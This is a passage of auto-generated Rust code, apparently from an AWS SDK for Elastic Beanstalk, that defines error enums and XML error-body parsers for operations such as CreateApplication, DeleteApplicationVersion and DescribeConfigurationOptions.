{ "InsufficientPrivilegesException" => ComposeEnvironmentsError::InsufficientPrivileges(String::from(parsed_error.message)),"TooManyEnvironmentsException" => ComposeEnvironmentsError::TooManyEnvironments(String::from(parsed_error.message)),_ => ComposeEnvironmentsError::Unknown(String::from(body)) } }, Err(_) => ComposeEnvironmentsError::Unknown(body.to_string()) } } } impl From<XmlParseError> for ComposeEnvironmentsError { fn from(err: XmlParseError) -> ComposeEnvironmentsError { let XmlParseError(message) = err; ComposeEnvironmentsError::Unknown(message.to_string()) } } impl From<CredentialsError> for ComposeEnvironmentsError { fn from(err: CredentialsError) -> ComposeEnvironmentsError { ComposeEnvironmentsError::Credentials(err) } } impl From<HttpDispatchError> for ComposeEnvironmentsError { fn from(err: HttpDispatchError) -> ComposeEnvironmentsError { ComposeEnvironmentsError::HttpDispatch(err) } } impl fmt::Display for ComposeEnvironmentsError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for ComposeEnvironmentsError { fn description(&self) -> &str { match *self { ComposeEnvironmentsError::InsufficientPrivileges(ref cause) => cause, ComposeEnvironmentsError::TooManyEnvironments(ref cause) => cause, ComposeEnvironmentsError::Validation(ref cause) => cause, ComposeEnvironmentsError::Credentials(ref err) => err.description(), ComposeEnvironmentsError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), ComposeEnvironmentsError::Unknown(ref cause) => cause } } } /// Errors returned by CreateApplication #[derive(Debug, PartialEq)] pub enum CreateApplicationError { ///<p>The specified account has reached its limit of applications.</p> TooManyApplications(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl CreateApplicationError { pub fn from_body(body: &str) -> CreateApplicationError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
{ "TooManyApplicationsException" => CreateApplicationError::TooManyApplications(String::from(parsed_error.message)),_ => CreateApplicationError::Unknown(String::from(body)) } }, Err(_) => CreateApplicationError::Unknown(body.to_string()) } } } impl From<XmlParseError> for CreateApplicationError { fn from(err: XmlParseError) -> CreateApplicationError { let XmlParseError(message) = err; CreateApplicationError::Unknown(message.to_string()) } } impl From<CredentialsError> for CreateApplicationError { fn from(err: CredentialsError) -> CreateApplicationError { CreateApplicationError::Credentials(err) } } impl From<HttpDispatchError> for CreateApplicationError { fn from(err: HttpDispatchError) -> CreateApplicationError { CreateApplicationError::HttpDispatch(err) } } impl fmt::Display for CreateApplicationError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for CreateApplicationError { fn description(&self) -> &str { match *self { CreateApplicationError::TooManyApplications(ref cause) => cause, CreateApplicationError::Validation(ref cause) => cause, CreateApplicationError::Credentials(ref err) => err.description(), CreateApplicationError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), CreateApplicationError::Unknown(ref cause) => cause } } } /// Errors returned by CreateApplicationVersion #[derive(Debug, PartialEq)] pub enum CreateApplicationVersionError { ///<p>AWS CodeBuild is not available in the specified region.</p> CodeBuildNotInServiceRegion(String), ///<p>The specified account does not have sufficient privileges for one of more AWS services.</p> InsufficientPrivileges(String), ///<p>The specified S3 bucket does not belong to the S3 region in which the service is running. The following regions are supported:</p> <ul> <li> <p>IAD/us-east-1</p> </li> <li> <p>PDX/us-west-2</p> </li> <li> <p>DUB/eu-west-1</p> </li> </ul> S3LocationNotInServiceRegion(String), ///<p>The specified account has reached its limit of application versions.</p> TooManyApplicationVersions(String), ///<p>The specified account has reached its limit of applications.</p> TooManyApplications(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl CreateApplicationVersionError { pub fn from_body(body: &str) -> CreateApplicationVersionError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
{ "CodeBuildNotInServiceRegionException" => CreateApplicationVersionError::CodeBuildNotInServiceRegion(String::from(parsed_error.message)),"InsufficientPrivilegesException" => CreateApplicationVersionError::InsufficientPrivileges(String::from(parsed_error.message)),"S3LocationNotInServiceRegionException" => CreateApplicationVersionError::S3LocationNotInServiceRegion(String::from(parsed_error.message)),"TooManyApplicationVersionsException" => CreateApplicationVersionError::TooManyApplicationVersions(String::from(parsed_error.message)),"TooManyApplicationsException" => CreateApplicationVersionError::TooManyApplications(String::from(parsed_error.message)),_ => CreateApplicationVersionError::Unknown(String::from(body)) } }, Err(_) => CreateApplicationVersionError::Unknown(body.to_string()) } } } impl From<XmlParseError> for CreateApplicationVersionError { fn from(err: XmlParseError) -> CreateApplicationVersionError { let XmlParseError(message) = err; CreateApplicationVersionError::Unknown(message.to_string()) } } impl From<CredentialsError> for CreateApplicationVersionError { fn from(err: CredentialsError) -> CreateApplicationVersionError { CreateApplicationVersionError::Credentials(err) } } impl From<HttpDispatchError> for CreateApplicationVersionError { fn from(err: HttpDispatchError) -> CreateApplicationVersionError { CreateApplicationVersionError::HttpDispatch(err) } } impl fmt::Display for CreateApplicationVersionError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for CreateApplicationVersionError { fn description(&self) -> &str { match *self { CreateApplicationVersionError::CodeBuildNotInServiceRegion(ref cause) => cause, CreateApplicationVersionError::InsufficientPrivileges(ref cause) => cause, CreateApplicationVersionError::S3LocationNotInServiceRegion(ref cause) => cause, CreateApplicationVersionError::TooManyApplicationVersions(ref cause) => cause, CreateApplicationVersionError::TooManyApplications(ref cause) => cause, CreateApplicationVersionError::Validation(ref cause) => cause, CreateApplicationVersionError::Credentials(ref err) => err.description(), CreateApplicationVersionError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), CreateApplicationVersionError::Unknown(ref cause) => cause } } } /// Errors returned by CreateConfigurationTemplate #[derive(Debug, PartialEq)] pub enum CreateConfigurationTemplateError { ///<p>The specified account does not have sufficient privileges for one of more AWS services.</p> InsufficientPrivileges(String), ///<p>The specified account has reached its limit of Amazon S3 buckets.</p> TooManyBuckets(String), ///<p>The specified account has reached its limit of configuration templates.</p> TooManyConfigurationTemplates(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl CreateConfigurationTemplateError { pub fn from_body(body: &str) -> CreateConfigurationTemplateError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
{ "InsufficientPrivilegesException" => CreateConfigurationTemplateError::InsufficientPrivileges(String::from(parsed_error.message)),"TooManyBucketsException" => CreateConfigurationTemplateError::TooManyBuckets(String::from(parsed_error.message)),"TooManyConfigurationTemplatesException" => CreateConfigurationTemplateError::TooManyConfigurationTemplates(String::from(parsed_error.message)),_ => CreateConfigurationTemplateError::Unknown(String::from(body)) } }, Err(_) => CreateConfigurationTemplateError::Unknown(body.to_string()) } } } impl From<XmlParseError> for CreateConfigurationTemplateError { fn from(err: XmlParseError) -> CreateConfigurationTemplateError { let XmlParseError(message) = err; CreateConfigurationTemplateError::Unknown(message.to_string()) } } impl From<CredentialsError> for CreateConfigurationTemplateError { fn from(err: CredentialsError) -> CreateConfigurationTemplateError { CreateConfigurationTemplateError::Credentials(err) } } impl From<HttpDispatchError> for CreateConfigurationTemplateError { fn from(err: HttpDispatchError) -> CreateConfigurationTemplateError { CreateConfigurationTemplateError::HttpDispatch(err) } } impl fmt::Display for CreateConfigurationTemplateError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for CreateConfigurationTemplateError { fn description(&self) -> &str { match *self { CreateConfigurationTemplateError::InsufficientPrivileges(ref cause) => cause, CreateConfigurationTemplateError::TooManyBuckets(ref cause) => cause, CreateConfigurationTemplateError::TooManyConfigurationTemplates(ref cause) => cause, CreateConfigurationTemplateError::Validation(ref cause) => cause, CreateConfigurationTemplateError::Credentials(ref err) => err.description(), CreateConfigurationTemplateError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), CreateConfigurationTemplateError::Unknown(ref cause) => cause } } } /// Errors returned by CreateEnvironment #[derive(Debug, PartialEq)] pub enum CreateEnvironmentError { ///<p>The specified account does not have sufficient privileges for one of more AWS services.</p> InsufficientPrivileges(String), ///<p>The specified account has reached its limit of environments.</p> TooManyEnvironments(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl CreateEnvironmentError { pub fn from_body(body: &str) -> CreateEnvironmentError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
{ "InsufficientPrivilegesException" => CreateEnvironmentError::InsufficientPrivileges(String::from(parsed_error.message)),"TooManyEnvironmentsException" => CreateEnvironmentError::TooManyEnvironments(String::from(parsed_error.message)),_ => CreateEnvironmentError::Unknown(String::from(body)) } }, Err(_) => CreateEnvironmentError::Unknown(body.to_string()) } } } impl From<XmlParseError> for CreateEnvironmentError { fn from(err: XmlParseError) -> CreateEnvironmentError { let XmlParseError(message) = err; CreateEnvironmentError::Unknown(message.to_string()) } } impl From<CredentialsError> for CreateEnvironmentError { fn from(err: CredentialsError) -> CreateEnvironmentError { CreateEnvironmentError::Credentials(err) } } impl From<HttpDispatchError> for CreateEnvironmentError { fn from(err: HttpDispatchError) -> CreateEnvironmentError { CreateEnvironmentError::HttpDispatch(err) } } impl fmt::Display for CreateEnvironmentError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for CreateEnvironmentError { fn description(&self) -> &str { match *self { CreateEnvironmentError::InsufficientPrivileges(ref cause) => cause, CreateEnvironmentError::TooManyEnvironments(ref cause) => cause, CreateEnvironmentError::Validation(ref cause) => cause, CreateEnvironmentError::Credentials(ref err) => err.description(), CreateEnvironmentError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), CreateEnvironmentError::Unknown(ref cause) => cause } } } /// Errors returned by CreateStorageLocation #[derive(Debug, PartialEq)] pub enum CreateStorageLocationError { ///<p>The specified account does not have sufficient privileges for one of more AWS services.</p> InsufficientPrivileges(String), ///<p>The specified account does not have a subscription to Amazon S3.</p> S3SubscriptionRequired(String), ///<p>The specified account has reached its limit of Amazon S3 buckets.</p> TooManyBuckets(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl CreateStorageLocationError { pub fn from_body(body: &str) -> CreateStorageLocationError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
{ "InsufficientPrivilegesException" => CreateStorageLocationError::InsufficientPrivileges(String::from(parsed_error.message)),"S3SubscriptionRequiredException" => CreateStorageLocationError::S3SubscriptionRequired(String::from(parsed_error.message)),"TooManyBucketsException" => CreateStorageLocationError::TooManyBuckets(String::from(parsed_error.message)),_ => CreateStorageLocationError::Unknown(String::from(body)) } }, Err(_) => CreateStorageLocationError::Unknown(body.to_string()) } } } impl From<XmlParseError> for CreateStorageLocationError { fn from(err: XmlParseError) -> CreateStorageLocationError { let XmlParseError(message) = err; CreateStorageLocationError::Unknown(message.to_string()) } } impl From<CredentialsError> for CreateStorageLocationError { fn from(err: CredentialsError) -> CreateStorageLocationError { CreateStorageLocationError::Credentials(err) } } impl From<HttpDispatchError> for CreateStorageLocationError { fn from(err: HttpDispatchError) -> CreateStorageLocationError { CreateStorageLocationError::HttpDispatch(err) } } impl fmt::Display for CreateStorageLocationError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for CreateStorageLocationError { fn description(&self) -> &str { match *self { CreateStorageLocationError::InsufficientPrivileges(ref cause) => cause, CreateStorageLocationError::S3SubscriptionRequired(ref cause) => cause, CreateStorageLocationError::TooManyBuckets(ref cause) => cause, CreateStorageLocationError::Validation(ref cause) => cause, CreateStorageLocationError::Credentials(ref err) => err.description(), CreateStorageLocationError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), CreateStorageLocationError::Unknown(ref cause) => cause } } } /// Errors returned by DeleteApplication #[derive(Debug, PartialEq)] pub enum DeleteApplicationError { ///<p>Unable to perform the specified operation because another operation that effects an element in this activity is already in progress.</p> OperationInProgress(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DeleteApplicationError { pub fn from_body(body: &str) -> DeleteApplicationError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
{ "OperationInProgressException" => DeleteApplicationError::OperationInProgress(String::from(parsed_error.message)),_ => DeleteApplicationError::Unknown(String::from(body)) } }, Err(_) => DeleteApplicationError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DeleteApplicationError { fn from(err: XmlParseError) -> DeleteApplicationError { let XmlParseError(message) = err; DeleteApplicationError::Unknown(message.to_string()) } } impl From<CredentialsError> for DeleteApplicationError { fn from(err: CredentialsError) -> DeleteApplicationError { DeleteApplicationError::Credentials(err) } } impl From<HttpDispatchError> for DeleteApplicationError { fn from(err: HttpDispatchError) -> DeleteApplicationError { DeleteApplicationError::HttpDispatch(err) } } impl fmt::Display for DeleteApplicationError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DeleteApplicationError { fn description(&self) -> &str { match *self { DeleteApplicationError::OperationInProgress(ref cause) => cause, DeleteApplicationError::Validation(ref cause) => cause, DeleteApplicationError::Credentials(ref err) => err.description(), DeleteApplicationError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DeleteApplicationError::Unknown(ref cause) => cause } } } /// Errors returned by DeleteApplicationVersion #[derive(Debug, PartialEq)] pub enum DeleteApplicationVersionError { ///<p>The specified account does not have sufficient privileges for one of more AWS services.</p> InsufficientPrivileges(String), ///<p>Unable to perform the specified operation because another operation that effects an element in this activity is already in progress.</p> OperationInProgress(String), ///<p>The specified S3 bucket does not belong to the S3 region in which the service is running. The following regions are supported:</p> <ul> <li> <p>IAD/us-east-1</p> </li> <li> <p>PDX/us-west-2</p> </li> <li> <p>DUB/eu-west-1</p> </li> </ul> S3LocationNotInServiceRegion(String), ///<p>Unable to delete the Amazon S3 source bundle associated with the application version. The application version was deleted successfully.</p> SourceBundleDeletion(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DeleteApplicationVersionError { pub fn from_body(body: &str) -> DeleteApplicationVersionError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
{ "InsufficientPrivilegesException" => DeleteApplicationVersionError::InsufficientPrivileges(String::from(parsed_error.message)),"OperationInProgressException" => DeleteApplicationVersionError::OperationInProgress(String::from(parsed_error.message)),"S3LocationNotInServiceRegionException" => DeleteApplicationVersionError::S3LocationNotInServiceRegion(String::from(parsed_error.message)),"SourceBundleDeletionException" => DeleteApplicationVersionError::SourceBundleDeletion(String::from(parsed_error.message)),_ => DeleteApplicationVersionError::Unknown(String::from(body)) } }, Err(_) => DeleteApplicationVersionError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DeleteApplicationVersionError { fn from(err: XmlParseError) -> DeleteApplicationVersionError { let XmlParseError(message) = err; DeleteApplicationVersionError::Unknown(message.to_string()) } } impl From<CredentialsError> for DeleteApplicationVersionError { fn from(err: CredentialsError) -> DeleteApplicationVersionError { DeleteApplicationVersionError::Credentials(err) } } impl From<HttpDispatchError> for DeleteApplicationVersionError { fn from(err: HttpDispatchError) -> DeleteApplicationVersionError { DeleteApplicationVersionError::HttpDispatch(err) } } impl fmt::Display for DeleteApplicationVersionError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DeleteApplicationVersionError { fn description(&self) -> &str { match *self { DeleteApplicationVersionError::InsufficientPrivileges(ref cause) => cause, DeleteApplicationVersionError::OperationInProgress(ref cause) => cause, DeleteApplicationVersionError::S3LocationNotInServiceRegion(ref cause) => cause, DeleteApplicationVersionError::SourceBundleDeletion(ref cause) => cause, DeleteApplicationVersionError::Validation(ref cause) => cause, DeleteApplicationVersionError::Credentials(ref err) => err.description(), DeleteApplicationVersionError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DeleteApplicationVersionError::Unknown(ref cause) => cause } } } /// Errors returned by DeleteConfigurationTemplate #[derive(Debug, PartialEq)] pub enum DeleteConfigurationTemplateError { ///<p>Unable to perform the specified operation because another operation that effects an element in this activity is already in progress.</p> OperationInProgress(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DeleteConfigurationTemplateError { pub fn from_body(body: &str) -> DeleteConfigurationTemplateError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
{ "OperationInProgressException" => DeleteConfigurationTemplateError::OperationInProgress(String::from(parsed_error.message)),_ => DeleteConfigurationTemplateError::Unknown(String::from(body)) } }, Err(_) => DeleteConfigurationTemplateError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DeleteConfigurationTemplateError { fn from(err: XmlParseError) -> DeleteConfigurationTemplateError { let XmlParseError(message) = err; DeleteConfigurationTemplateError::Unknown(message.to_string()) } } impl From<CredentialsError> for DeleteConfigurationTemplateError { fn from(err: CredentialsError) -> DeleteConfigurationTemplateError { DeleteConfigurationTemplateError::Credentials(err) } } impl From<HttpDispatchError> for DeleteConfigurationTemplateError { fn from(err: HttpDispatchError) -> DeleteConfigurationTemplateError { DeleteConfigurationTemplateError::HttpDispatch(err) } } impl fmt::Display for DeleteConfigurationTemplateError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DeleteConfigurationTemplateError { fn description(&self) -> &str { match *self { DeleteConfigurationTemplateError::OperationInProgress(ref cause) => cause, DeleteConfigurationTemplateError::Validation(ref cause) => cause, DeleteConfigurationTemplateError::Credentials(ref err) => err.description(), DeleteConfigurationTemplateError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DeleteConfigurationTemplateError::Unknown(ref cause) => cause } } } /// Errors returned by DeleteEnvironmentConfiguration #[derive(Debug, PartialEq)] pub enum DeleteEnvironmentConfigurationError { /// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DeleteEnvironmentConfigurationError { pub fn from_body(body: &str) -> DeleteEnvironmentConfigurationError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
/// Errors returned by DeleteEnvironmentConfiguration
#[derive(Debug, PartialEq)]
pub enum DeleteEnvironmentConfigurationError {
    /// An error occurred dispatching the HTTP request
    HttpDispatch(HttpDispatchError),
    /// An error was encountered with AWS credentials.
    Credentials(CredentialsError),
    /// A validation error occurred. Details from AWS are provided.
    Validation(String),
    /// An unknown error occurred. The raw HTTP response is provided.
    Unknown(String),
}

impl DeleteEnvironmentConfigurationError {
    pub fn from_body(body: &str) -> DeleteEnvironmentConfigurationError {
        let reader = EventReader::new(body.as_bytes());
        let mut stack = XmlResponse::new(reader.into_iter().peekable());
        let _start_document = stack.next();
        let _response_envelope = stack.next();
        match XmlErrorDeserializer::deserialize("Error", &mut stack) {
            Ok(parsed_error) => {
                match &parsed_error.code[..] {
                    _ => DeleteEnvironmentConfigurationError::Unknown(String::from(body)),
                }
            }
            Err(_) => DeleteEnvironmentConfigurationError::Unknown(body.to_string()),
        }
    }
}

impl From<XmlParseError> for DeleteEnvironmentConfigurationError {
    fn from(err: XmlParseError) -> DeleteEnvironmentConfigurationError {
        let XmlParseError(message) = err;
        DeleteEnvironmentConfigurationError::Unknown(message.to_string())
    }
}

impl From<CredentialsError> for DeleteEnvironmentConfigurationError {
    fn from(err: CredentialsError) -> DeleteEnvironmentConfigurationError {
        DeleteEnvironmentConfigurationError::Credentials(err)
    }
}

impl From<HttpDispatchError> for DeleteEnvironmentConfigurationError {
    fn from(err: HttpDispatchError) -> DeleteEnvironmentConfigurationError {
        DeleteEnvironmentConfigurationError::HttpDispatch(err)
    }
}

impl fmt::Display for DeleteEnvironmentConfigurationError {
    fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
        write!(f, "{}", self.description())
    }
}

impl Error for DeleteEnvironmentConfigurationError {
    fn description(&self) -> &str {
        match *self {
            DeleteEnvironmentConfigurationError::Validation(ref cause) => cause,
            DeleteEnvironmentConfigurationError::Credentials(ref err) => err.description(),
            DeleteEnvironmentConfigurationError::HttpDispatch(ref dispatch_error) => dispatch_error.description(),
            DeleteEnvironmentConfigurationError::Unknown(ref cause) => cause,
        }
    }
}

/// Errors returned by DescribeApplicationVersions
#[derive(Debug, PartialEq)]
pub enum DescribeApplicationVersionsError {
    /// An error occurred dispatching the HTTP request
    HttpDispatch(HttpDispatchError),
    /// An error was encountered with AWS credentials.
    Credentials(CredentialsError),
    /// A validation error occurred. Details from AWS are provided.
    Validation(String),
    /// An unknown error occurred. The raw HTTP response is provided.
    Unknown(String),
}

impl DescribeApplicationVersionsError {
    pub fn from_body(body: &str) -> DescribeApplicationVersionsError {
        let reader = EventReader::new(body.as_bytes());
        let mut stack = XmlResponse::new(reader.into_iter().peekable());
        let _start_document = stack.next();
        let _response_envelope = stack.next();
        match XmlErrorDeserializer::deserialize("Error", &mut stack) {
            Ok(parsed_error) => {
                match &parsed_error.code[..] {
                    _ => DescribeApplicationVersionsError::Unknown(String::from(body)),
                }
            }
            Err(_) => DescribeApplicationVersionsError::Unknown(body.to_string()),
        }
    }
}

impl From<XmlParseError> for DescribeApplicationVersionsError {
    fn from(err: XmlParseError) -> DescribeApplicationVersionsError {
        let XmlParseError(message) = err;
        DescribeApplicationVersionsError::Unknown(message.to_string())
    }
}

impl From<CredentialsError> for DescribeApplicationVersionsError {
    fn from(err: CredentialsError) -> DescribeApplicationVersionsError {
        DescribeApplicationVersionsError::Credentials(err)
    }
}

impl From<HttpDispatchError> for DescribeApplicationVersionsError {
    fn from(err: HttpDispatchError) -> DescribeApplicationVersionsError {
        DescribeApplicationVersionsError::HttpDispatch(err)
    }
}

impl fmt::Display for DescribeApplicationVersionsError {
    fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
        write!(f, "{}", self.description())
    }
}

impl Error for DescribeApplicationVersionsError {
    fn description(&self) -> &str {
        match *self {
            DescribeApplicationVersionsError::Validation(ref cause) => cause,
            DescribeApplicationVersionsError::Credentials(ref err) => err.description(),
            DescribeApplicationVersionsError::HttpDispatch(ref dispatch_error) => dispatch_error.description(),
            DescribeApplicationVersionsError::Unknown(ref cause) => cause,
        }
    }
}

/// Errors returned by DescribeApplications
#[derive(Debug, PartialEq)]
pub enum DescribeApplicationsError {
    /// An error occurred dispatching the HTTP request
    HttpDispatch(HttpDispatchError),
    /// An error was encountered with AWS credentials.
    Credentials(CredentialsError),
    /// A validation error occurred. Details from AWS are provided.
    Validation(String),
    /// An unknown error occurred. The raw HTTP response is provided.
    Unknown(String),
}

impl DescribeApplicationsError {
    pub fn from_body(body: &str) -> DescribeApplicationsError {
        let reader = EventReader::new(body.as_bytes());
        let mut stack = XmlResponse::new(reader.into_iter().peekable());
        let _start_document = stack.next();
        let _response_envelope = stack.next();
        match XmlErrorDeserializer::deserialize("Error", &mut stack) {
            Ok(parsed_error) => {
                match &parsed_error.code[..] {
                    _ => DescribeApplicationsError::Unknown(String::from(body)),
                }
            }
            Err(_) => DescribeApplicationsError::Unknown(body.to_string()),
        }
    }
}

impl From<XmlParseError> for DescribeApplicationsError {
    fn from(err: XmlParseError) -> DescribeApplicationsError {
        let XmlParseError(message) = err;
        DescribeApplicationsError::Unknown(message.to_string())
    }
}

impl From<CredentialsError> for DescribeApplicationsError {
    fn from(err: CredentialsError) -> DescribeApplicationsError {
        DescribeApplicationsError::Credentials(err)
    }
}

impl From<HttpDispatchError> for DescribeApplicationsError {
    fn from(err: HttpDispatchError) -> DescribeApplicationsError {
        DescribeApplicationsError::HttpDispatch(err)
    }
}

impl fmt::Display for DescribeApplicationsError {
    fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
        write!(f, "{}", self.description())
    }
}

impl Error for DescribeApplicationsError {
    fn description(&self) -> &str {
        match *self {
            DescribeApplicationsError::Validation(ref cause) => cause,
            DescribeApplicationsError::Credentials(ref err) => err.description(),
            DescribeApplicationsError::HttpDispatch(ref dispatch_error) => dispatch_error.description(),
            DescribeApplicationsError::Unknown(ref cause) => cause,
        }
    }
}
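// Operations such as DescribeApplications model no service-specific faults,
// so the `match` in `from_body` has only the catch-all arm and every service
// error surfaces as `Unknown` with the raw XML body attached. A minimal
// sketch of inspecting it (the `result` binding is a placeholder):
//
//     if let Err(DescribeApplicationsError::Unknown(body)) = result {
//         eprintln!("unmodeled service error: {}", body);
//     }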
{ "TooManyBucketsException" => DescribeConfigurationOptionsError::TooManyBuckets(String::from(parsed_error.message)),_ => DescribeConfigurationOptionsError::Unknown(String::from(body)) } }, Err(_) => DescribeConfigurationOptionsError::Unknown(body.to_string()) } } } impl From<XmlParseError> for DescribeConfigurationOptionsError { fn from(err: XmlParseError) -> DescribeConfigurationOptionsError { let XmlParseError(message) = err; DescribeConfigurationOptionsError::Unknown(message.to_string()) } } impl From<CredentialsError> for DescribeConfigurationOptionsError { fn from(err: CredentialsError) -> DescribeConfigurationOptionsError { DescribeConfigurationOptionsError::Credentials(err) } } impl From<HttpDispatchError> for DescribeConfigurationOptionsError { fn from(err: HttpDispatchError) -> DescribeConfigurationOptionsError { DescribeConfigurationOptionsError::HttpDispatch(err) } } impl fmt::Display for DescribeConfigurationOptionsError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.description()) } } impl Error for DescribeConfigurationOptionsError { fn description(&self) -> &str { match *self { DescribeConfigurationOptionsError::TooManyBuckets(ref cause) => cause, DescribeConfigurationOptionsError::Validation(ref cause) => cause, DescribeConfigurationOptionsError::Credentials(ref err) => err.description(), DescribeConfigurationOptionsError::HttpDispatch(ref dispatch_error) => dispatch_error.description(), DescribeConfigurationOptionsError::Unknown(ref cause) => cause } } } /// Errors returned by DescribeConfigurationSettings #[derive(Debug, PartialEq)] pub enum DescribeConfigurationSettingsError { ///<p>The specified account has reached its limit of Amazon S3 buckets.</p> TooManyBuckets(String),/// An error occurred dispatching the HTTP request HttpDispatch(HttpDispatchError),/// An error was encountered with AWS credentials. Credentials(CredentialsError),/// A validation error occurred. Details from AWS are provided. Validation(String),/// An unknown error occurred. The raw HTTP response is provided. Unknown(String) } impl DescribeConfigurationSettingsError { pub fn from_body(body: &str) -> DescribeConfigurationSettingsError { let reader = EventReader::new(body.as_bytes()); let mut stack = XmlResponse::new(reader.into_iter().peekable()); let _start_document = stack.next(); let _response_envelope = stack.next(); match XmlErrorDeserializer::deserialize("Error", &mut stack) { Ok(parsed_error) => { match &parsed_error.code[..] 
